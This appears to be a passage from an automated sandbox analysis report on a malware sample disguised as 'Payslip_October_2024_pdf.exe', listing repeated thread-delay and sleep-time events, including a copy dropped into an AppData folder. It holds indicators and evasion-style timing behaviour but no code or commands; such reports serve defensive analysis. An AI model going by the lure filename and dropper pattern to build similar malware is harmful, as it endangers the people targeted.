                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597094Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596969Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596859Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596749Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596641Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596526Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596420Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596283Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596035Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595906Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595797Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595670Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595562Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595453Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595344Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595234Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595125Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595016Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594900Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594794Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594681Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594578Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594469Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594344Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594234Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599891Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599766Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599649Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599531Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599422Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599312Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599203Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599094Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598985Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598860Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598735Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598610Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598485Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598360Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598235Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598110Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597985Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597860Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597735Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597610Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597485Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597360Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597248Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597125Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596998Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596875Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596766Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596656Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596547Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596438Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596328Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596219Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596094Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595984Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595875Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595766Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595656Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595547Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595437Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595328Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595219Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595094Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594985Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594860Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594735Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594606Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594397Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594282Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594157Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeWindow / User API: threadDelayed 7719Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeWindow / User API: threadDelayed 2117Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWindow / User API: threadDelayed 6298Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWindow / User API: threadDelayed 3552Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWindow / User API: threadDelayed 2422Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWindow / User API: threadDelayed 7415Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe TID: 4400Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe TID: 6128Thread sleep time: -35048813740048126s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe TID: 6128Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe TID: 6128Thread sleep time: -599891s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe TID: 6128Thread sleep time: -599766s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe TID: 6128Thread sleep time: -599641s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe TID: 6128Thread sleep time: -599531s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe TID: 6128Thread sleep time: -599422s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe TID: 6128Thread sleep time: -599313s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe TID: 6128Thread sleep time: -599188s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe TID: 6128Thread sleep time: -599063s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe TID: 6128Thread sleep time: -598953s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe TID: 6128Thread sleep time: -598844s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe TID: 6128Thread sleep time: -598719s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe TID: 6128Thread sleep time: -598606s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe TID: 6128Thread sleep time: -598484s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe TID: 6128Thread sleep time: -598366s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe TID: 6128Thread sleep time: -598191s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe TID: 6128Thread sleep time: -598068s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe TID: 6128Thread sleep time: -597938s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe TID: 6128Thread sleep time: -597813s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe TID: 6128Thread sleep time: -597688s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe TID: 6128Thread sleep time: -597563s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe TID: 6128Thread sleep time: -597438s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe TID: 6128Thread sleep time: -597328s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe TID: 6128Thread sleep time: -597219s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe TID: 6128Thread sleep time: -597094s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe TID: 6128Thread sleep time: -596984s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe TID: 6128Thread sleep time: -596871s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe TID: 6128Thread sleep time: -596766s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe TID: 6128Thread sleep time: -596656s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe TID: 6128Thread sleep time: -596547s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe TID: 6128Thread sleep time: -596438s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe TID: 6128Thread sleep time: -596313s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe TID: 6128Thread sleep time: -596203s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe TID: 6128Thread sleep time: -596094s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe TID: 6128Thread sleep time: -595969s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe TID: 6128Thread sleep time: -595856s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe TID: 6128Thread sleep time: -595730s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe TID: 6128Thread sleep time: -595526s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe TID: 6128Thread sleep time: -595422s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe TID: 6128Thread sleep time: -595313s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe TID: 6128Thread sleep time: -595203s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe TID: 6128Thread sleep time: -595094s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe TID: 6128Thread sleep time: -594969s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe TID: 6128Thread sleep time: -594859s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe TID: 6128Thread sleep time: -594749s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe TID: 6128Thread sleep time: -594640s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe TID: 6128Thread sleep time: -594531s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe TID: 6128Thread sleep time: -594422s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe TID: 6128Thread sleep time: -594313s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe TID: 6128Thread sleep time: -594188s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe TID: 6128Thread sleep time: -594078s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 320Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5596Thread sleep count: 34 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5596Thread sleep time: -31359464925306218s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5596Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5596Thread sleep time: -599891s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 1628Thread sleep count: 6298 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 1628Thread sleep count: 3552 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5596Thread sleep time: -599766s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5596Thread sleep time: -599656s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5596Thread sleep time: -599547s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5596Thread sleep time: -599437s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5596Thread sleep time: -599328s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5596Thread sleep time: -599219s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5596Thread sleep time: -599109s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5596Thread sleep time: -599000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5596Thread sleep time: -598891s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5596Thread sleep time: -598766s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5596Thread sleep time: -598641s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5596Thread sleep time: -598531s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5596Thread sleep time: -598422s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5596Thread sleep time: -598312s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5596Thread sleep time: -598203s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5596Thread sleep time: -598076s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5596Thread sleep time: -597969s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5596Thread sleep time: -597859s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5596Thread sleep time: -597750s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5596Thread sleep time: -597641s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5596Thread sleep time: -597531s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5596Thread sleep time: -597422s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5596Thread sleep time: -597313s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5596Thread sleep time: -597203s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5596Thread sleep time: -597094s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5596Thread sleep time: -596969s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5596Thread sleep time: -596859s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5596Thread sleep time: -596749s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5596Thread sleep time: -596641s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5596Thread sleep time: -596526s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5596Thread sleep time: -596420s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5596Thread sleep time: -596283s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5596Thread sleep time: -596035s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5596Thread sleep time: -595906s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5596Thread sleep time: -595797s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5596Thread sleep time: -595670s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5596Thread sleep time: -595562s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5596Thread sleep time: -595453s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5596Thread sleep time: -595344s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5596Thread sleep time: -595234s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5596Thread sleep time: -595125s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5596Thread sleep time: -595016s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5596Thread sleep time: -594900s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5596Thread sleep time: -594794s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5596Thread sleep time: -594681s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5596Thread sleep time: -594578s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5596Thread sleep time: -594469s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5596Thread sleep time: -594344s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5596Thread sleep time: -594234s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 6224Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 6428Thread sleep time: -32281802128991695s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 6428Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 6428Thread sleep time: -599891s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 6428Thread sleep time: -599766s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 6428Thread sleep time: -599649s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 6428Thread sleep time: -599531s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 6428Thread sleep time: -599422s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 6428Thread sleep time: -599312s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 6428Thread sleep time: -599203s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 6428Thread sleep time: -599094s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 6428Thread sleep time: -598985s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 6428Thread sleep time: -598860s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 6428Thread sleep time: -598735s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 6428Thread sleep time: -598610s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 6428Thread sleep time: -598485s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 6428Thread sleep time: -598360s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 6428Thread sleep time: -598235s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 6428Thread sleep time: -598110s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 6428Thread sleep time: -597985s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 6428Thread sleep time: -597860s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 6428Thread sleep time: -597735s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 6428Thread sleep time: -597610s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 6428Thread sleep time: -597485s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 6428Thread sleep time: -597360s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 6428Thread sleep time: -597248s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 6428Thread sleep time: -597125s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 6428Thread sleep time: -596998s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 6428Thread sleep time: -596875s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 6428Thread sleep time: -596766s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 6428Thread sleep time: -596656s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 6428Thread sleep time: -596547s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 6428Thread sleep time: -596438s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 6428Thread sleep time: -596328s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 6428Thread sleep time: -596219s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 6428Thread sleep time: -596094s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 6428Thread sleep time: -595984s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 6428Thread sleep time: -595875s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 6428Thread sleep time: -595766s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 6428Thread sleep time: -595656s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 6428Thread sleep time: -595547s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 6428Thread sleep time: -595437s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 6428Thread sleep time: -595328s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 6428Thread sleep time: -595219s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 6428Thread sleep time: -595094s >= -30000sJump to behavior
